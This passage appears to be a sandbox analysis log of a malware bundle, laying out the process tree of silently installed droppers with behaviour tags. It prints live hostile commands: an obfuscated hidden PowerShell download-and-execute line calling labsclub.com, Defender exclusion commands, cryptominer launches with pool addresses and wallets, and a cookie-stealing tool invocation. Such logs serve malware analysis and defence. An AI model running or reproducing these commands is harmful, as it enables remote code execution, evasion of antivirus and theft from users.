- Suspicious use of SetWindowsHookEx
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\is-NDHTS.tmp\elrtzrqbdi1.tmp"C:\Users\Admin\AppData\Local\Temp\is-NDHTS.tmp\elrtzrqbdi1.tmp" /SL5="$1034C,2592217,780800,C:\Users\Admin\AppData\Local\Temp\1wcj0tml3yg\elrtzrqbdi1.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5264 -
C:\Users\Admin\AppData\Local\Temp\is-OBI8S.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-OBI8S.tmp\winlthsth.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4804 -
C:\Users\Admin\AppData\Local\Temp\GO7uHb4oo.exe"C:\Users\Admin\AppData\Local\Temp\GO7uHb4oo.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5224 -
C:\Users\Admin\AppData\Local\Temp\GO7uHb4oo.exe"C:\Users\Admin\AppData\Local\Temp\GO7uHb4oo.exe"12⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5936
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:6952
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:14104
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ipu0ptcyanc\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ipu0ptcyanc\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5280 -
C:\Users\Admin\AppData\Local\Temp\is-21DC9.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-21DC9.tmp\Setup3310.tmp" /SL5="$1035C,138429,56832,C:\Users\Admin\AppData\Local\Temp\ipu0ptcyanc\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5336 -
C:\Users\Admin\AppData\Local\Temp\is-OI825.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OI825.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:2716 -
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:644 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:184
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2064
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1408 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 94812⤵
- Program crash
PID:11680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 100412⤵
- Program crash
PID:12628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 102012⤵
- Program crash
PID:13376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 114812⤵
- Program crash
PID:13860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 116412⤵
- Program crash
PID:14144
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 119212⤵
- Program crash
PID:3824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 121612⤵
- Program crash
PID:14732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 154412⤵
- Program crash
PID:15404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 166012⤵
- Program crash
PID:4264
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 179612⤵
- Program crash
PID:7296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 184412⤵
- Program crash
PID:7996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 144412⤵
- Program crash
PID:6880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 167212⤵
- Program crash
PID:8020
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4316
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4280 -
C:\Users\Admin\AppData\Local\Temp\is-LH1FK.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-LH1FK.tmp\LabPicV3.tmp" /SL5="$20342,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3580 -
C:\Users\Admin\AppData\Local\Temp\is-TP121.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-TP121.tmp\ppppppfy.exe" /S /UID=lab21413⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
PID:5368 -
C:\Program Files\Microsoft Office 15\VPRBPDBRNG\prolab.exe"C:\Program Files\Microsoft Office 15\VPRBPDBRNG\prolab.exe" /VERYSILENT14⤵
- Suspicious use of SetWindowsHookEx
PID:7004 -
C:\Users\Admin\AppData\Local\Temp\is-ACF5S.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-ACF5S.tmp\prolab.tmp" /SL5="$202D6,575243,216576,C:\Program Files\Microsoft Office 15\VPRBPDBRNG\prolab.exe" /VERYSILENT15⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:7144
-
-
-
C:\Users\Admin\AppData\Local\Temp\32-04d94-d1b-70ab4-d984c40a9be19\Vaezhilesushe.exe"C:\Users\Admin\AppData\Local\Temp\32-04d94-d1b-70ab4-d984c40a9be19\Vaezhilesushe.exe"14⤵PID:7020
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 193615⤵PID:13712
-
-
-
C:\Users\Admin\AppData\Local\Temp\bf-6605e-ab9-c7fa5-8d57eacb2a8f8\Lazhelilijo.exe"C:\Users\Admin\AppData\Local\Temp\bf-6605e-ab9-c7fa5-8d57eacb2a8f8\Lazhelilijo.exe"14⤵PID:7032
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xjcxasfr.zp1\md6_6ydj.exe & exit15⤵PID:16152
-
C:\Users\Admin\AppData\Local\Temp\xjcxasfr.zp1\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\xjcxasfr.zp1\md6_6ydj.exe16⤵PID:4336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gblwlksy.0ab\askinstall31.exe & exit15⤵PID:6088
-
C:\Users\Admin\AppData\Local\Temp\gblwlksy.0ab\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\gblwlksy.0ab\askinstall31.exe16⤵PID:7436
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:10464
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:10956
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ogcognlo.r0w\toolspab1.exe & exit15⤵PID:7260
-
C:\Users\Admin\AppData\Local\Temp\ogcognlo.r0w\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ogcognlo.r0w\toolspab1.exe16⤵PID:7692
-
C:\Users\Admin\AppData\Local\Temp\ogcognlo.r0w\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ogcognlo.r0w\toolspab1.exe17⤵PID:8000
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bft1tnoy.vnm\setup_10.2_mix.exe & exit15⤵PID:10020
-
C:\Users\Admin\AppData\Local\Temp\bft1tnoy.vnm\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\bft1tnoy.vnm\setup_10.2_mix.exe16⤵PID:10712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lntmeoeh.d04\GcleanerWW.exe /mixone & exit15⤵PID:10524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r540qcn4.h43\app.exe /8-2222 & exit15⤵PID:10984
-
C:\Users\Admin\AppData\Local\Temp\r540qcn4.h43\app.exeC:\Users\Admin\AppData\Local\Temp\r540qcn4.h43\app.exe /8-222216⤵PID:11604
-
C:\Users\Admin\AppData\Local\Temp\r540qcn4.h43\app.exe"C:\Users\Admin\AppData\Local\Temp\r540qcn4.h43\app.exe" /8-222217⤵PID:8260
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hodnldgu.vjr\file.exe & exit15⤵PID:11564
-
C:\Users\Admin\AppData\Local\Temp\hodnldgu.vjr\file.exeC:\Users\Admin\AppData\Local\Temp\hodnldgu.vjr\file.exe16⤵PID:12212
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"17⤵PID:14756
-
C:\Users\Admin\AppData\Local\Temp\7TVKS0800G\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7TVKS0800G\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:9796
-
C:\Users\Admin\AppData\Local\Temp\7TVKS0800G\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7TVKS0800G\multitimer.exe" 1 3.1617432539.60680fdb6e609 10119⤵PID:15032
-
C:\Users\Admin\AppData\Local\Temp\7TVKS0800G\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\7TVKS0800G\multitimer.exe" 2 3.1617432539.60680fdb6e60920⤵PID:3924
-
C:\Users\Admin\AppData\Local\Temp\rfydrswjzd3\vict.exe"C:\Users\Admin\AppData\Local\Temp\rfydrswjzd3\vict.exe" /VERYSILENT /id=53521⤵PID:15320
-
C:\Users\Admin\AppData\Local\Temp\is-L6ODP.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-L6ODP.tmp\vict.tmp" /SL5="$6068A,870426,780800,C:\Users\Admin\AppData\Local\Temp\rfydrswjzd3\vict.exe" /VERYSILENT /id=53522⤵PID:8028
-
C:\Users\Admin\AppData\Local\Temp\is-QCCM0.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-QCCM0.tmp\win1host.exe" 53523⤵PID:8964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ukce5c1llwm\app.exe"C:\Users\Admin\AppData\Local\Temp\ukce5c1llwm\app.exe" /8-2321⤵PID:15072
-
-
C:\Users\Admin\AppData\Local\Temp\pelyrh0s45x\fx5qgniztmg.exe"C:\Users\Admin\AppData\Local\Temp\pelyrh0s45x\fx5qgniztmg.exe" /ustwo INSTALL21⤵PID:4392
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "fx5qgniztmg.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\pelyrh0s45x\fx5qgniztmg.exe" & exit22⤵PID:12712
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "fx5qgniztmg.exe" /f23⤵
- Kills process with taskkill
PID:5060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ef5w5jszuoh\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ef5w5jszuoh\cpyrix.exe" /VERYSILENT21⤵PID:7600
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵PID:10172
-
C:\Users\Admin\AppData\Local\Temp\382ab982-fb51-4a01-9c13-2cfc3c0786cb\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\382ab982-fb51-4a01-9c13-2cfc3c0786cb\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\382ab982-fb51-4a01-9c13-2cfc3c0786cb\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run23⤵PID:8336
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\382ab982-fb51-4a01-9c13-2cfc3c0786cb\test.bat"24⤵PID:8040
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force23⤵PID:13692
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵PID:6124
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵PID:5916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wfeiavyq2qo\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\wfeiavyq2qo\Setup3310.exe" /Verysilent /subid=57721⤵PID:9528
-
C:\Users\Admin\AppData\Local\Temp\is-F4DGF.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-F4DGF.tmp\Setup3310.tmp" /SL5="$7055E,138429,56832,C:\Users\Admin\AppData\Local\Temp\wfeiavyq2qo\Setup3310.exe" /Verysilent /subid=57722⤵PID:12128
-
C:\Users\Admin\AppData\Local\Temp\is-E1HT9.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-E1HT9.tmp\Setup.exe" /Verysilent23⤵PID:9188
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3UNY1K3O2S\setups.exe"C:\Users\Admin\AppData\Local\Temp\3UNY1K3O2S\setups.exe" ll18⤵PID:9760
-
C:\Users\Admin\AppData\Local\Temp\is-TI1LV.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-TI1LV.tmp\setups.tmp" /SL5="$3013E,635399,250368,C:\Users\Admin\AppData\Local\Temp\3UNY1K3O2S\setups.exe" ll19⤵PID:10388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"17⤵PID:10368
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵PID:13476
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
PID:13916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"17⤵PID:7116
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:15140
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:8016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"17⤵PID:15288
-
C:\Users\Admin\AppData\Roaming\925A.tmp.exe"C:\Users\Admin\AppData\Roaming\925A.tmp.exe"18⤵PID:9616
-
C:\Users\Admin\AppData\Roaming\925A.tmp.exe"C:\Users\Admin\AppData\Roaming\925A.tmp.exe"19⤵PID:9340
-
-
-
C:\Users\Admin\AppData\Roaming\C794.tmp.exe"C:\Users\Admin\AppData\Roaming\C794.tmp.exe"18⤵PID:10316
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:11108
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵PID:6876
-
-
-
C:\Users\Admin\AppData\Roaming\D495.tmp.exe"C:\Users\Admin\AppData\Roaming\D495.tmp.exe"18⤵PID:3212
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"18⤵PID:11792
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:13116
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"17⤵PID:10256
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kk5pbulp.l0h\Four.exe & exit15⤵PID:12232
-
C:\Users\Admin\AppData\Local\Temp\kk5pbulp.l0h\Four.exeC:\Users\Admin\AppData\Local\Temp\kk5pbulp.l0h\Four.exe16⤵PID:12928
-
C:\Users\Admin\AppData\Local\Temp\0ZHPT4BD9O\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0ZHPT4BD9O\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:8516
-
C:\Users\Admin\AppData\Local\Temp\0ZHPT4BD9O\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0ZHPT4BD9O\multitimer.exe" 1 3.1617432517.60680fc51bb61 10418⤵PID:12172
-
C:\Users\Admin\AppData\Local\Temp\0ZHPT4BD9O\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0ZHPT4BD9O\multitimer.exe" 2 3.1617432517.60680fc51bb6119⤵PID:14536
-
C:\Users\Admin\AppData\Local\Temp\nkw20la3qtt\l3kouuvg0qw.exe"C:\Users\Admin\AppData\Local\Temp\nkw20la3qtt\l3kouuvg0qw.exe" /ustwo INSTALL20⤵PID:14024
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "l3kouuvg0qw.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nkw20la3qtt\l3kouuvg0qw.exe" & exit21⤵PID:13512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "l3kouuvg0qw.exe" /f22⤵
- Kills process with taskkill
PID:4272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yufarnx4nhs\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\yufarnx4nhs\Setup3310.exe" /Verysilent /subid=57720⤵PID:12232
-
C:\Users\Admin\AppData\Local\Temp\is-50RS6.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-50RS6.tmp\Setup3310.tmp" /SL5="$70466,138429,56832,C:\Users\Admin\AppData\Local\Temp\yufarnx4nhs\Setup3310.exe" /Verysilent /subid=57721⤵PID:10396
-
C:\Users\Admin\AppData\Local\Temp\is-D7L6R.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-D7L6R.tmp\Setup.exe" /Verysilent22⤵PID:6524
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\32l1et4sjlo\app.exe"C:\Users\Admin\AppData\Local\Temp\32l1et4sjlo\app.exe" /8-2320⤵PID:8868
-
-
C:\Users\Admin\AppData\Local\Temp\a10ykisl1hn\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\a10ykisl1hn\cpyrix.exe" /VERYSILENT20⤵PID:8920
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵PID:14076
-
C:\Users\Admin\AppData\Local\Temp\89117142-01b7-40d2-8093-4b7140eddeaf\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\89117142-01b7-40d2-8093-4b7140eddeaf\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\89117142-01b7-40d2-8093-4b7140eddeaf\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run22⤵PID:6476
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\89117142-01b7-40d2-8093-4b7140eddeaf\test.bat"23⤵PID:7228
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force22⤵PID:14464
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 122⤵PID:8096
-
C:\Windows\SysWOW64\timeout.exetimeout 123⤵
- Delays execution with timeout.exe
PID:14256
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"22⤵PID:4644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14076 -s 168022⤵
- Program crash
PID:13844
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵PID:9544
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵PID:13484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rlzs21o24c4\vict.exe"C:\Users\Admin\AppData\Local\Temp\rlzs21o24c4\vict.exe" /VERYSILENT /id=53520⤵PID:14508
-
C:\Users\Admin\AppData\Local\Temp\is-10QBN.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-10QBN.tmp\vict.tmp" /SL5="$504FE,870426,780800,C:\Users\Admin\AppData\Local\Temp\rlzs21o24c4\vict.exe" /VERYSILENT /id=53521⤵PID:9360
-
C:\Users\Admin\AppData\Local\Temp\is-3F0FJ.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-3F0FJ.tmp\win1host.exe" 53522⤵PID:12016
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IM2EDJAO43\setups.exe"C:\Users\Admin\AppData\Local\Temp\IM2EDJAO43\setups.exe" ll17⤵PID:8204
-
C:\Users\Admin\AppData\Local\Temp\is-BMJMJ.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-BMJMJ.tmp\setups.tmp" /SL5="$30632,635399,250368,C:\Users\Admin\AppData\Local\Temp\IM2EDJAO43\setups.exe" ll18⤵PID:8708
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5664 -
C:\Users\Admin\AppData\Local\Temp\is-RHE97.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-RHE97.tmp\lylal220.tmp" /SL5="$3048C,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5400 -
C:\Users\Admin\AppData\Local\Temp\is-KNDVS.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-KNDVS.tmp\Microsoft.exe" /S /UID=lylal22013⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:6080 -
C:\Program Files\Windows Mail\POQWOLXCYS\irecord.exe"C:\Program Files\Windows Mail\POQWOLXCYS\irecord.exe" /VERYSILENT14⤵
- Suspicious use of SetWindowsHookEx
PID:6240 -
C:\Users\Admin\AppData\Local\Temp\is-4D4L0.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-4D4L0.tmp\irecord.tmp" /SL5="$60496,6265333,408064,C:\Program Files\Windows Mail\POQWOLXCYS\irecord.exe" /VERYSILENT15⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:8
-
-
-
C:\Users\Admin\AppData\Local\Temp\f2-c27e8-8dc-65cbc-cc4cf4f80648b\Nibuwotino.exe"C:\Users\Admin\AppData\Local\Temp\f2-c27e8-8dc-65cbc-cc4cf4f80648b\Nibuwotino.exe"14⤵PID:6160
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 211215⤵PID:14400
-
-
-
C:\Users\Admin\AppData\Local\Temp\30-f7551-fbc-c2aab-0aa9ea4bd7706\Xahepapeje.exe"C:\Users\Admin\AppData\Local\Temp\30-f7551-fbc-c2aab-0aa9ea4bd7706\Xahepapeje.exe"14⤵PID:4308
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4qkjdspv.523\md6_6ydj.exe & exit15⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\4qkjdspv.523\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\4qkjdspv.523\md6_6ydj.exe16⤵PID:7452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vmqismkp.qz5\askinstall31.exe & exit15⤵PID:7176
-
C:\Users\Admin\AppData\Local\Temp\vmqismkp.qz5\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\vmqismkp.qz5\askinstall31.exe16⤵PID:7684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tncja1m3.etk\toolspab1.exe & exit15⤵PID:7564
-
C:\Users\Admin\AppData\Local\Temp\tncja1m3.etk\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\tncja1m3.etk\toolspab1.exe16⤵PID:7936
-
C:\Users\Admin\AppData\Local\Temp\tncja1m3.etk\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\tncja1m3.etk\toolspab1.exe17⤵PID:8268
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0hkchmd5.2c3\setup_10.2_mix.exe & exit15⤵PID:12448
-
C:\Users\Admin\AppData\Local\Temp\0hkchmd5.2c3\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\0hkchmd5.2c3\setup_10.2_mix.exe16⤵PID:13036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gryrkp4s.lfs\GcleanerWW.exe /mixone & exit15⤵PID:13068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\got2hfqs.out\app.exe /8-2222 & exit15⤵PID:13648
-
